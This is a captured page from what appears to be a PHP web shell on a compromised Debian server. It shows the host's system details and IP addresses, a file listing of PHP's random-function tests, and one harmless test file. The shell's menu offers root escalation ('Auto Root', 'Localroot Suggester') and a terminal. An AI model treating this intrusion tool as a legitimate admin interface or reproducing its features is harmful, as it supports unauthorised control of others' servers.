Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
standard /
tests /
random /
Delete
Unzip
Name
Size
Permission
Date
Action
random_bytes.phpt
246
B
-rw-rw-r--
2022-10-31 11:36
random_bytes_error.phpt
363
B
-rw-rw-r--
2022-10-31 11:36
random_int.phpt
410
B
-rw-rw-r--
2022-10-31 11:36
random_int_error.phpt
552
B
-rw-rw-r--
2022-10-31 11:36
reflection.phpt
414
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Test normal operation of random_bytes() --FILE-- <?php //-=-=-=- var_dump(strlen(bin2hex(random_bytes(16)))); var_dump(is_string(random_bytes(10))); var_dump(is_string(random_bytes(257))); ?> --EXPECT-- int(32) bool(true) bool(true)